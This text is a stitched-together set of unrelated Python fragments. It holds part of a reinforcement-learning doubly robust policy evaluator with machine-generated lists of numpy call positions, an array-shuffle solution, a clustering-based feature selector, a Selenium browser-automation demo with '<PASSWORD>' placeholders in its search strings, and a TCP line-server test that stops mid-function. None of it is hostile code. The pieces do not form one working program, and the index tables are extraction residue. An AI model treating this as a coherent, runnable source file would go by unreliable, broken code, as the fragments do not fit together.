reward_trajectories = to_equal_length(reward_trajectories, 0)
logged_propensity_trajectories = to_equal_length(
logged_propensity_trajectories, 1
)
target_propensity_trajectories = to_equal_length(
target_propensity_trajectories, np.zeros([num_actions])
)
Q_value_trajectories = to_equal_length(
Q_value_trajectories, np.zeros([num_actions])
)
return (
action_trajectories,
reward_trajectories,
logged_propensity_trajectories,
target_propensity_trajectories,
Q_value_trajectories,
)
@staticmethod
def normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
):
if whether_self_normalize_importance_weights:
sum_importance_weights = np.sum(importance_weights, axis=0)
where_zeros = np.where(sum_importance_weights == 0.0)[0]
sum_importance_weights[where_zeros] = len(importance_weights)
importance_weights[:, where_zeros] = 1.0
importance_weights /= sum_importance_weights
return importance_weights
else:
importance_weights /= importance_weights.shape[0]
return importance_weights
@staticmethod
def calculate_step_return(
rewards,
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values,
estimated_q_values,
j_step,
):
trajectory_length = len(rewards[0])
num_trajectories = len(rewards)
j_step = int(min(j_step, trajectory_length - 1))
weighted_discounts = np.multiply(discounts, importance_weights)
weighted_discounts_one_earlier = np.multiply(
discounts, importance_weights_one_earlier
)
importance_sampled_cumulative_reward = np.sum(
np.multiply(weighted_discounts[:, : j_step + 1], rewards[:, : j_step + 1]),
axis=1,
)
if j_step < trajectory_length - 1:
direct_method_value = (
weighted_discounts_one_earlier[:, j_step + 1]
* estimated_state_values[:, j_step + 1]
)
else:
direct_method_value = np.zeros([num_trajectories])
control_variate = np.sum(
np.multiply(
weighted_discounts[:, : j_step + 1], estimated_q_values[:, : j_step + 1]
)
- np.multiply(
weighted_discounts_one_earlier[:, : j_step + 1],
estimated_state_values[:, : j_step + 1],
),
axis=1,
)
j_step_return = (
importance_sampled_cumulative_reward + direct_method_value - control_variate
)
return j_step_return
@staticmethod
def confidence_bounds(x, confidence):
n = len(x)
m, se = np.mean(x), sp.stats.sem(x)
h = se * sp.stats.t._ppf((1 + confidence) / 2.0, n - 1)
return m - h, m + h
def mse_loss(x, error):
return np.dot(np.dot(x, error), x.T)
| [
"logging.getLogger",
"scipy.stats.t._ppf",
"numpy.hstack",
"numpy.array",
"numpy.nanmean",
"scipy.stats.sem",
"numpy.cov",
"numpy.arange",
"numpy.mean",
"numpy.multiply",
"numpy.where",
"numpy.dot",
"ml.rl.evaluation.cpe.CpeEstimate",
"numpy.logspace",
"numpy.ones",
"numpy.random.choice",
"itertools.zip_longest",
"numpy.nonzero",
"numpy.std",
"numpy.sum",
"numpy.zeros",
"numpy.cumprod"
] | [((305, 332), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (322, 332), False, 'import logging\n'), ((2219, 2257), 'numpy.cumprod', 'np.cumprod', (['importance_weights'], {'axis': '(1)'}), '(importance_weights, axis=1)\n', (2229, 2257), True, 'import numpy as np\n'), ((2604, 2675), 'numpy.hstack', 'np.hstack', (['[importance_weights_one_earlier, importance_weights[:, :-1]]'], {}), '([importance_weights_one_earlier, importance_weights[:, :-1]])\n', (2613, 2675), True, 'import numpy as np\n'), ((2719, 2811), 'numpy.logspace', 'np.logspace', ([], {'start': '(0)', 'stop': '(trajectory_length - 1)', 'num': 'trajectory_length', 'base': 'self.gamma'}), '(start=0, stop=trajectory_length - 1, num=trajectory_length,\n base=self.gamma)\n', (2730, 2811), True, 'import numpy as np\n'), ((3379, 3415), 'numpy.array', 'np.array', (['j_step_return_trajectories'], {}), '(j_step_return_trajectories)\n', (3387, 3415), True, 'import numpy as np\n'), ((3442, 3484), 'numpy.sum', 'np.sum', (['j_step_return_trajectories'], {'axis': '(1)'}), '(j_step_return_trajectories, axis=1)\n', (3448, 3484), True, 'import numpy as np\n'), ((7126, 7152), 'numpy.nanmean', 'np.nanmean', (['episode_values'], {}), '(episode_values)\n', (7136, 7152), True, 'import numpy as np\n'), ((7336, 7549), 'ml.rl.evaluation.cpe.CpeEstimate', 'CpeEstimate', ([], {'raw': 'weighted_doubly_robust', 'normalized': '(weighted_doubly_robust / denominator)', 'raw_std_error': 'weighted_doubly_robust_std_error', 'normalized_std_error': '(weighted_doubly_robust_std_error / denominator)'}), '(raw=weighted_doubly_robust, normalized=weighted_doubly_robust /\n denominator, raw_std_error=weighted_doubly_robust_std_error,\n normalized_std_error=weighted_doubly_robust_std_error / denominator)\n', (7347, 7549), False, 'from ml.rl.evaluation.cpe import CpeEstimate\n'), ((8085, 8108), 'numpy.zeros', 'np.zeros', (['[num_j_steps]'], {}), '([num_j_steps])\n', (8093, 8108), True, 'import numpy as np\n'), ((8410, 8444), 'numpy.cov', 'np.cov', (['j_step_return_trajectories'], {}), '(j_step_return_trajectories)\n', (8416, 8444), True, 'import numpy as np\n'), ((8851, 8866), 'numpy.array', 'np.array', (['res.x'], {}), '(res.x)\n', (8859, 8866), True, 'import numpy as np\n'), ((9494, 9520), 'numpy.zeros', 'np.zeros', (['mdp_ids.shape[0]'], {}), '(mdp_ids.shape[0])\n', (9502, 9520), True, 'import numpy as np\n'), ((12708, 12750), 'numpy.multiply', 'np.multiply', (['discounts', 'importance_weights'], {}), '(discounts, importance_weights)\n', (12719, 12750), True, 'import numpy as np\n'), ((12792, 12846), 'numpy.multiply', 'np.multiply', (['discounts', 'importance_weights_one_earlier'], {}), '(discounts, importance_weights_one_earlier)\n', (12803, 12846), True, 'import numpy as np\n'), ((14105, 14121), 'numpy.dot', 'np.dot', (['x', 'error'], {}), '(x, error)\n', (14111, 14121), True, 'import numpy as np\n'), ((1792, 1833), 'numpy.multiply', 'np.multiply', (['target_propensities', 'actions'], {}), '(target_propensities, actions)\n', (1803, 1833), True, 'import numpy as np\n'), ((1919, 1959), 'numpy.multiply', 'np.multiply', (['estimated_q_values', 'actions'], {}), '(estimated_q_values, actions)\n', (1930, 1959), True, 'import numpy as np\n'), ((2031, 2083), 'numpy.multiply', 'np.multiply', (['target_propensities', 'estimated_q_values'], {}), '(target_propensities, estimated_q_values)\n', (2042, 2083), True, 'import numpy as np\n'), ((7003, 7029), 'numpy.std', 'np.std', (['bootstrapped_means'], {}), '(bootstrapped_means)\n', (7009, 7029), True, 'import numpy as np\n'), ((7063, 7094), 'numpy.multiply', 'np.multiply', (['rewards', 'discounts'], {}), '(rewards, discounts)\n', (7074, 7094), True, 'import numpy as np\n'), ((7208, 7293), 'ml.rl.evaluation.cpe.CpeEstimate', 'CpeEstimate', ([], {'raw': '(0.0)', 'normalized': '(0.0)', 'raw_std_error': '(0.0)', 'normalized_std_error': '(0.0)'}), '(raw=0.0, normalized=0.0, raw_std_error=0.0,\n normalized_std_error=0.0)\n', (7219, 7293), False, 'from ml.rl.evaluation.cpe import CpeEstimate\n'), ((8131, 8167), 'numpy.where', 'np.where', (['(j_step_returns < low_bound)'], {}), '(j_step_returns < low_bound)\n', (8139, 8167), True, 'import numpy as np\n'), ((8269, 8306), 'numpy.where', 'np.where', (['(j_step_returns > high_bound)'], {}), '(j_step_returns > high_bound)\n', (8277, 8306), True, 'import numpy as np\n'), ((8888, 8913), 'numpy.dot', 'np.dot', (['x', 'j_step_returns'], {}), '(x, j_step_returns)\n', (8894, 8913), True, 'import numpy as np\n'), ((9755, 9776), 'numpy.nonzero', 'np.nonzero', (['terminals'], {}), '(terminals)\n', (9765, 9776), True, 'import numpy as np\n'), ((10949, 10972), 'numpy.zeros', 'np.zeros', (['[num_actions]'], {}), '([num_actions])\n', (10957, 10972), True, 'import numpy as np\n'), ((11269, 11292), 'numpy.zeros', 'np.zeros', (['[num_actions]'], {}), '([num_actions])\n', (11277, 11292), True, 'import numpy as np\n'), ((11385, 11408), 'numpy.zeros', 'np.zeros', (['[num_actions]'], {}), '([num_actions])\n', (11393, 11408), True, 'import numpy as np\n'), ((11860, 11894), 'numpy.sum', 'np.sum', (['importance_weights'], {'axis': '(0)'}), '(importance_weights, axis=0)\n', (11866, 11894), True, 'import numpy as np\n'), ((12937, 13009), 'numpy.multiply', 'np.multiply', (['weighted_discounts[:, :j_step + 1]', 'rewards[:, :j_step + 1]'], {}), '(weighted_discounts[:, :j_step + 1], rewards[:, :j_step + 1])\n', (12948, 13009), True, 'import numpy as np\n'), ((13303, 13331), 'numpy.zeros', 'np.zeros', (['[num_trajectories]'], {}), '([num_trajectories])\n', (13311, 13331), True, 'import numpy as np\n'), ((13941, 13951), 'numpy.mean', 'np.mean', (['x'], {}), '(x)\n', (13948, 13951), True, 'import numpy as np\n'), ((13953, 13968), 'scipy.stats.sem', 'sp.stats.sem', (['x'], {}), '(x)\n', (13965, 13968), True, 'import scipy as sp\n'), ((13986, 14032), 'scipy.stats.t._ppf', 'sp.stats.t._ppf', (['((1 + confidence) / 2.0)', '(n - 1)'], {}), '((1 + confidence) / 2.0, n - 1)\n', (14001, 14032), True, 'import scipy as sp\n'), ((2497, 2527), 'numpy.ones', 'np.ones', (['[num_trajectories, 1]'], {}), '([num_trajectories, 1])\n', (2504, 2527), True, 'import numpy as np\n'), ((4435, 4473), 'numpy.cumprod', 'np.cumprod', (['importance_weights'], {'axis': '(1)'}), '(importance_weights, axis=1)\n', (4445, 4473), True, 'import numpy as np\n'), ((4887, 4958), 'numpy.hstack', 'np.hstack', (['[importance_weights_one_earlier, importance_weights[:, :-1]]'], {}), '([importance_weights_one_earlier, importance_weights[:, :-1]])\n', (4896, 4958), True, 'import numpy as np\n'), ((6381, 6438), 'numpy.random.choice', 'np.random.choice', (['num_j_steps', 'sample_size'], {'replace': '(False)'}), '(num_j_steps, sample_size, replace=False)\n', (6397, 6438), True, 'import numpy as np\n'), ((9976, 10017), 'numpy.arange', 'np.arange', (['episode_start', '(episode_end + 1)'], {}), '(episode_start, episode_end + 1)\n', (9985, 10017), True, 'import numpy as np\n'), ((11921, 11960), 'numpy.where', 'np.where', (['(sum_importance_weights == 0.0)'], {}), '(sum_importance_weights == 0.0)\n', (11929, 11960), True, 'import numpy as np\n'), ((13379, 13467), 'numpy.multiply', 'np.multiply', (['weighted_discounts[:, :j_step + 1]', 'estimated_q_values[:, :j_step + 1]'], {}), '(weighted_discounts[:, :j_step + 1], estimated_q_values[:, :\n j_step + 1])\n', (13390, 13467), True, 'import numpy as np\n'), ((13509, 13612), 'numpy.multiply', 'np.multiply', (['weighted_discounts_one_earlier[:, :j_step + 1]', 'estimated_state_values[:, :j_step + 1]'], {}), '(weighted_discounts_one_earlier[:, :j_step + 1],\n estimated_state_values[:, :j_step + 1])\n', (13520, 13612), True, 'import numpy as np\n'), ((8585, 8594), 'numpy.sum', 'np.sum', (['x'], {}), '(x)\n', (8591, 8594), True, 'import numpy as np\n'), ((10756, 10803), 'itertools.zip_longest', 'itertools.zip_longest', (['*x'], {'fillvalue': 'fill_value'}), '(*x, fillvalue=fill_value)\n', (10777, 10803), False, 'import itertools\n')] |
# -*- coding: utf-8 -*-
# @Author: 何睿
# @Create Date: 2019-08-03 10:48:30
# @Last Modified by: 何睿
# @Last Modified time: 2019-08-03 10:53:15
import copy
import random
from typing import List
class Solution:
def __init__(self, nums: List[int]):
self.shuffle_ = nums
self.original = copy.copy(nums)
def reset(self) -> List[int]:
"""
Resets the array to its original configuration and return it.
"""
return self.original
def shuffle(self) -> List[int]:
"""
Returns a random shuffling of the array.
"""
random.shuffle(self.shuffle_)
return self.shuffle_
| [
"copy.copy",
"random.shuffle"
] | [((327, 342), 'copy.copy', 'copy.copy', (['nums'], {}), '(nums)\n', (336, 342), False, 'import copy\n'), ((619, 648), 'random.shuffle', 'random.shuffle', (['self.shuffle_'], {}), '(self.shuffle_)\n', (633, 648), False, 'import random\n')] |
import numpy as np
import sklearn
import pandas as pd
import scipy.spatial.distance as ssd
from scipy.cluster import hierarchy
from scipy.stats import chi2_contingency
from sklearn.base import BaseEstimator
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_selection import SelectKBest, SelectorMixin
from sklearn.pipeline import Pipeline
class SelectHierarchicalClustering(SelectorMixin, BaseEstimator):
"""
A transformer that clusters the features in X according to dist_matrix, and selects a feature from each cluster with
the highest chi2 score of X[feature] versus y
"""
def __init__(self, dist_matrix=None, threshold=1):
self.dist_matrix = dist_matrix
self.threshold = threshold
def _phi_coef(self, x, y):
"""
Calculates phi coefficient between features
Parameters
----------
x - feature x column
y - feature y column
Returns
----------
phi coefficient value
"""
confusion_matrix = pd.crosstab(x, y)
chi2 = chi2_contingency(confusion_matrix)[0]
n = confusion_matrix.sum().sum()
corr = np.sqrt(chi2 / n)
return corr
def _calc_dist_matrix(self, X):
"""
Calculate distance matrix between each two features in X, each value is 1-phi_correlation
"""
X_df = pd.DataFrame.sparse.from_spmatrix(X)
X_corr_mat = X_df.corr(method=self._phi_coef)
feature_corr_dist_matrix = 1 - X_corr_mat
feature_corr_dist_matrix_condensed = ssd.squareform(feature_corr_dist_matrix)
self.dist_matrix = feature_corr_dist_matrix_condensed
def _corr_linkage(self, method='average'):
linkage = hierarchy.linkage(self.dist_matrix, method=method)
return linkage
def _hierarchical_clustering(self, linkage):
"""
Perform hierarchical clustering
Parameters
----------
linkage - linkage dendogram created by hierarchy.linkage(self.distance_matrix, method=method)
Returns
----------
a list of lists, each list represents a cluster and contains the indexes of features belonging
to the cluster
"""
# array of len(X) - array[i] is the cluster number to which sample i belongs
cluster_ids = hierarchy.fcluster(linkage, self.threshold, criterion='distance')
cluster_id_to_feature_idx = {}
for idx, cluster_id in enumerate(cluster_ids):
cluster_id_to_feature_idx.setdefault(cluster_id, []).append(idx)
return list(cluster_id_to_feature_idx.values())
def fit(self, X, y):
"""
Clusters the features (X columns) using self.dist_matrix and self.threshold, and selects a feature from each
cluster with the highest chi2 score versus y.
The attribute self.n_features_ represents the number of features selected (=number of clusters)
The attribute self.selected_features_ is a list of indexes that correspond to the selected features
"""
if not self.dist_matrix:
self._calc_dist_matrix(X)
linkage = self._corr_linkage()
clusters = self._hierarchical_clustering(linkage)
chi2_vals, __ = sklearn.feature_selection.chi2(X, y)
chi2_vals = pd.Series(chi2_vals)
# fitted attributes
self.n_features_ = X.shape[1]
self.selected_features_ = [chi2_vals[cluster].idxmax() for cluster in clusters]
self.clusters_ = clusters
print(f'threshold={self.threshold:.2f}, selected_features={len(self.selected_features_)}')
return self
def _get_support_mask(self):
"""
Get the boolean mask indicating which features are selected
Returns
----------
mask - boolean array of shape [# input features]
An element is True iff its corresponding feature is selected for
retention.
"""
# Checks if the estimator is fitted by verifying the presence of fitted attributes (ending with a trailing
# underscore) and otherwise raises a NotFittedError with the given message.
sklearn.utils.validation.check_is_fitted(self)
mask = np.zeros((self.n_features_, ), dtype=bool)
mask[self.selected_features_] = 1
return mask
def get_fs_pipeline(k, threshold, random_state=0):
"""
Creates feature selection pipeline
Parameters
----------
k - the k parameter for the SelectKBest features function
threshold - clustering threshold for the Hierarchial clustering
random_state - random state for the RandomForestClassifier. Deafult value: 0
Returns
----------
pipeline - feature selection pipeline
"""
pipeline = Pipeline(steps=[('vectorize', CountVectorizer(lowercase=False, binary=True)),
('k_best', SelectKBest(score_func=sklearn.feature_selection.chi2, k=k)),
('cluster', SelectHierarchicalClustering(threshold=threshold)),
('rf', RandomForestClassifier(random_state=random_state))])
return pipeline
| [
"pandas.Series",
"sklearn.utils.validation.check_is_fitted",
"scipy.spatial.distance.squareform",
"numpy.sqrt",
"scipy.stats.chi2_contingency",
"sklearn.feature_extraction.text.CountVectorizer",
"pandas.crosstab",
"sklearn.ensemble.RandomForestClassifier",
"sklearn.feature_selection.SelectKBest",
"numpy.zeros",
"scipy.cluster.hierarchy.linkage",
"pandas.DataFrame.sparse.from_spmatrix",
"sklearn.feature_selection.chi2",
"scipy.cluster.hierarchy.fcluster"
] | [((1112, 1129), 'pandas.crosstab', 'pd.crosstab', (['x', 'y'], {}), '(x, y)\n', (1123, 1129), True, 'import pandas as pd\n'), ((1239, 1256), 'numpy.sqrt', 'np.sqrt', (['(chi2 / n)'], {}), '(chi2 / n)\n', (1246, 1256), True, 'import numpy as np\n'), ((1453, 1489), 'pandas.DataFrame.sparse.from_spmatrix', 'pd.DataFrame.sparse.from_spmatrix', (['X'], {}), '(X)\n', (1486, 1489), True, 'import pandas as pd\n'), ((1641, 1681), 'scipy.spatial.distance.squareform', 'ssd.squareform', (['feature_corr_dist_matrix'], {}), '(feature_corr_dist_matrix)\n', (1655, 1681), True, 'import scipy.spatial.distance as ssd\n'), ((1812, 1862), 'scipy.cluster.hierarchy.linkage', 'hierarchy.linkage', (['self.dist_matrix'], {'method': 'method'}), '(self.dist_matrix, method=method)\n', (1829, 1862), False, 'from scipy.cluster import hierarchy\n'), ((2422, 2487), 'scipy.cluster.hierarchy.fcluster', 'hierarchy.fcluster', (['linkage', 'self.threshold'], {'criterion': '"""distance"""'}), "(linkage, self.threshold, criterion='distance')\n", (2440, 2487), False, 'from scipy.cluster import hierarchy\n'), ((3345, 3381), 'sklearn.feature_selection.chi2', 'sklearn.feature_selection.chi2', (['X', 'y'], {}), '(X, y)\n', (3375, 3381), False, 'import sklearn\n'), ((3402, 3422), 'pandas.Series', 'pd.Series', (['chi2_vals'], {}), '(chi2_vals)\n', (3411, 3422), True, 'import pandas as pd\n'), ((4260, 4306), 'sklearn.utils.validation.check_is_fitted', 'sklearn.utils.validation.check_is_fitted', (['self'], {}), '(self)\n', (4300, 4306), False, 'import sklearn\n'), ((4323, 4364), 'numpy.zeros', 'np.zeros', (['(self.n_features_,)'], {'dtype': 'bool'}), '((self.n_features_,), dtype=bool)\n', (4331, 4364), True, 'import numpy as np\n'), ((1145, 1179), 'scipy.stats.chi2_contingency', 'chi2_contingency', (['confusion_matrix'], {}), '(confusion_matrix)\n', (1161, 1179), False, 'from scipy.stats import chi2_contingency\n'), ((4896, 4941), 'sklearn.feature_extraction.text.CountVectorizer', 'CountVectorizer', ([], {'lowercase': '(False)', 'binary': '(True)'}), '(lowercase=False, binary=True)\n', (4911, 4941), False, 'from sklearn.feature_extraction.text import CountVectorizer\n'), ((4986, 5045), 'sklearn.feature_selection.SelectKBest', 'SelectKBest', ([], {'score_func': 'sklearn.feature_selection.chi2', 'k': 'k'}), '(score_func=sklearn.feature_selection.chi2, k=k)\n', (4997, 5045), False, 'from sklearn.feature_selection import SelectKBest, SelectorMixin\n'), ((5181, 5230), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (5203, 5230), False, 'from sklearn.ensemble import RandomForestClassifier\n')] |
from bs4 import BeautifulSoup
import requests
import re
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.touch_actions import TouchActions
from selenium.common.exceptions import TimeoutException
URL = 'https://shopping.thinkwithgoogle.com'
EXAMPLES = ["Demonstrate unexpected use-case",
"Demonstrate google search",
"Demonstrate search on thinkwithgoogle",
"Demonstrate search on WebDriverWait",
"Demonstrate search on thinkwithgoogle search result",
"Download and extract additional data",
"Demonstrate maximizing screen",
"Demonstrate mouse actions for Chrome",
"Demonstrate navigation"]
def run(input, URL):
if(input == 0):
content = requests.get(URL)
soup = BeautifulSoup(content.text,'html.parser')
print(soup.prettify()) # Print row with HTML formatting
elif(input == 1):
driver = webdriver.Safari()
driver.get("https://www.google.com")
search = driver.find_element_by_name("q")
search.send_keys("Sel<PASSWORD>") # Google Search "Selenium"
search.submit()
elif(input == 2):
browser = webdriver.Safari()
browser.get(URL)
time.sleep(5)
search = browser.find_elements_by_id('subjectInput')[1]
search.send_keys('Google <PASSWORD>') # Google Search "Google Pixel 3"
time.sleep(5)
search.send_keys(Keys.RETURN)
elif(input == 3):
browser = webdriver.Safari()
browser.maximize_window() # Required for the input tag visibility
browser.get('https://trends.google.com/trends/')
try: # proceed if element is found within 3 seconds otherwise raise TimeoutException
element = WebDriverWait(browser, 3).until(EC.presence_of_element_located((By.ID, 'input-254')))
except TimeoutException:
print("Loading took too much time!")
search = browser.find_elements(By.ID,'input-254')[0]
search.send_keys('Google Pixel 3')
elif(input == 4):
browser = webdriver.Safari()
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
elif(input == 5):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
time.sleep(2)
browser.find_element_by_class_name('si-button-data download-all').click()
data = browser.find_element_by_class_name('content content-breakpoint-gt-md')
dataList = data.find_elements_by_tag_name('li')
for item in dataList:
text = item.text
print(text)
elif(input == 6):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
element_to_hover_over = returnVisibleElement(browser.find_elements_by_xpath("//i[@class='material-icons'][contains(./text(),'help')]"))
elif(input == 7):
browser = webdriver.Chrome()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
element_to_hover_over = returnVisibleElement(browser.find_elements_by_xpath("//i[@class='material-icons'][contains(./text(),'help')]"))
## ActionChains are not supported in safari but will work on other browser
## https://github.com/seleniumhq/selenium-google-code-issue-archive/issues/4136
ActionChains(browser).click(element_to_hover_over).perform()
TouchActions(browser).long_press(element_to_hover_over).perform()
elif(input == 8):
browser = webdriver.Safari()
browser.maximize_window() # Required for the button visibility
browser.get(URL) # with visibility search
time.sleep(2)
search = returnVisibleElement(browser.find_elements_by_id('subjectInput'))
search.send_keys('Google Pixel 3')
time.sleep(2)
search.send_keys(Keys.ENTER)
time.sleep(2)
data = browser.find_element_by_class_name('content content-breakpoint-gt-md')
dataList = data.find_elements_by_tag_name('li')
for item in dataList:
text = item.text
print(text)
browser.back()
print('\n' * 5) # For convenient visual
def returnVisibleElement(listOfInputElements):
for element in listOfInputElements:
if element.is_displayed():
return element
def printSelection():
print('Press:')
for i in range(0, len(EXAMPLES)):
print('',i,'to',EXAMPLES[i], sep = ' ')
if __name__ == '__main__':
while(True):
printSelection()
choice = input('Enter choice: ')
try:
choice = int(choice)
except ValueError:
print('Invalid input, stop program')
break
if(choice not in range(0,9)):
print('Invalid input, stop program')
break
run(int(choice), URL)
| [
"selenium.webdriver.support.ui.WebDriverWait",
"selenium.webdriver.Safari",
"selenium.webdriver.Chrome",
"time.sleep",
"requests.get",
"bs4.BeautifulSoup",
"selenium.webdriver.common.action_chains.ActionChains",
"selenium.webdriver.common.touch_actions.TouchActions",
"selenium.webdriver.support.expected_conditions.presence_of_element_located"
] | [((1107, 1124), 'requests.get', 'requests.get', (['URL'], {}), '(URL)\n', (1119, 1124), False, 'import requests\n'), ((1140, 1182), 'bs4.BeautifulSoup', 'BeautifulSoup', (['content.text', '"""html.parser"""'], {}), "(content.text, 'html.parser')\n", (1153, 1182), False, 'from bs4 import BeautifulSoup\n'), ((1296, 1314), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (1312, 1314), False, 'from selenium import webdriver\n'), ((1568, 1586), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (1584, 1586), False, 'from selenium import webdriver\n'), ((1633, 1646), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1643, 1646), False, 'import time\n'), ((1804, 1817), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (1814, 1817), False, 'import time\n'), ((1896, 1914), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (1912, 1914), False, 'from selenium import webdriver\n'), ((2501, 2519), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (2517, 2519), False, 'from selenium import webdriver\n'), ((2597, 2610), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (2607, 2610), False, 'import time\n'), ((2745, 2758), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (2755, 2758), False, 'import time\n'), ((2221, 2273), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', (["(By.ID, 'input-254')"], {}), "((By.ID, 'input-254'))\n", (2251, 2273), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((2836, 2854), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (2852, 2854), False, 'from selenium import webdriver\n'), ((3009, 3022), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (3019, 3022), False, 'import time\n'), ((3157, 3170), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (3167, 3170), False, 'import time\n'), ((3216, 3229), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (3226, 3229), False, 'import time\n'), ((2189, 2214), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['browser', '(3)'], {}), '(browser, 3)\n', (2202, 2214), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((3577, 3595), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (3593, 3595), False, 'from selenium import webdriver\n'), ((3750, 3763), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (3760, 3763), False, 'import time\n'), ((3948, 3966), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (3964, 3966), False, 'from selenium import webdriver\n'), ((4121, 4134), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (4131, 4134), False, 'import time\n'), ((4627, 4645), 'selenium.webdriver.Safari', 'webdriver.Safari', ([], {}), '()\n', (4643, 4645), False, 'from selenium import webdriver\n'), ((4800, 4813), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (4810, 4813), False, 'import time\n'), ((4948, 4961), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (4958, 4961), False, 'import time\n'), ((5007, 5020), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (5017, 5020), False, 'import time\n'), ((4452, 4473), 'selenium.webdriver.common.action_chains.ActionChains', 'ActionChains', (['browser'], {}), '(browser)\n', (4464, 4473), False, 'from selenium.webdriver.common.action_chains import ActionChains\n'), ((4521, 4542), 'selenium.webdriver.common.touch_actions.TouchActions', 'TouchActions', (['browser'], {}), '(browser)\n', (4533, 4542), False, 'from selenium.webdriver.common.touch_actions import TouchActions\n')] |
#!/usr/bin/env python3
#******************************************************************************
# (C) 2018, <NAME>, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# Unit Tests *
#******************************************************************************
import sys
from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR
import UTIL.SYS, UTIL.TASK, UTIL.TCP
#############
# constants #
#############
LINEBUFFERLEN = 256
###########
# classes #
###########
# =============================================================================
class TCPserver(UTIL.TCP.SingleClientServer):
"""Subclass of UTIL.TCP.SingleClientServer"""
# ---------------------------------------------------------------------------
def __init__(self, portNr):
"""Initialise attributes only"""
modelTask = UTIL.TASK.s_processingTask
UTIL.TCP.SingleClientServer.__init__(self, modelTask, portNr)
self.tcpLineBuffer = ""
# ---------------------------------------------------------------------------
def receiveCallback(self, socket, stateMask):
"""Callback when a client has send data"""
LOG("*** receiveCallback ***")
# read the next set of byte from the data socket
data = self.recv(LINEBUFFERLEN)
if data == None:
# client is automatically disconnected
return
tcpLineBuffer = self.tcpLineBuffer
tcpLineBuffer += data.decode("ascii")
LOG("tcpLineBuffer: " + tcpLineBuffer)
# handle the input: extract the lines from the line buffer
lines = tcpLineBuffer.split("\n")
# the last line has to be handled in a special way and can not be
# processed directly
lastLine = lines[-1]
lines = lines[:-1]
if lastLine == "":
# read of the data was complete (incl. "\n")
pass
else:
# last line was cutt off and the rest should come with the next read
self.tcpLineBuffer = lastLine
for line in lines:
# remove a terminating "\r" for clients like telnet
if line[-1] == "\r":
line = line[:-1]
# terminate the client connection if exit has been entered (case insensitive)
upperLine = line.upper()
if (upperLine == "X") or (upperLine == "EXIT"):
LOG("Exit requested")
# send the OK response back to the client
retString = "OK\n"
self.send(retString.encode())
# terminate the client connection
self.disconnectClient();
return
if (upperLine == "Q") or (upperLine == "QUIT"):
LOG("Quit requested")
# send the OK response back to the client
retString = "OK\n"
self.send(retString.encode())
# terminate the client connection
self.disconnectClient();
sys.exit(0)
# delegate the input
pstatus = self.processLine(line);
if pstatus == 0:
LOG("OK")
# send the OK response back to the TECO
retString = "OK\n";
self.send(retString.encode())
else:
LOG_ERROR(str(pstatus))
# set the Error response back to the client:
retString = "Error: execution failed (see log)!\n"
self.send(retString.encode())
# ---------------------------------------------------------------------------
def processLine(self, line):
"""Callback when a client has send a data line"""
LOG("line = " + line)
return 0
#############
# functions #
#############
# -----------------------------------------------------------------------------
def initConfiguration():
"""initialise the system configuration"""
UTIL.SYS.s_configuration.setDefaults([
["HOST", "127.0.0.1"],
["SERVER_PORT", "1234"]])
# -----------------------------------------------------------------------------
def createServer():
"""create the TCP server"""
server = TCPserver(portNr=int(UTIL.SYS.s_configuration.SERVER_PORT))
if not server.openConnectPort(UTIL.SYS.s_configuration.HOST):
sys.exit(-1)
# activate zyclic idle function
idleFunction()
# -----------------------------------------------------------------------------
def idleFunction():
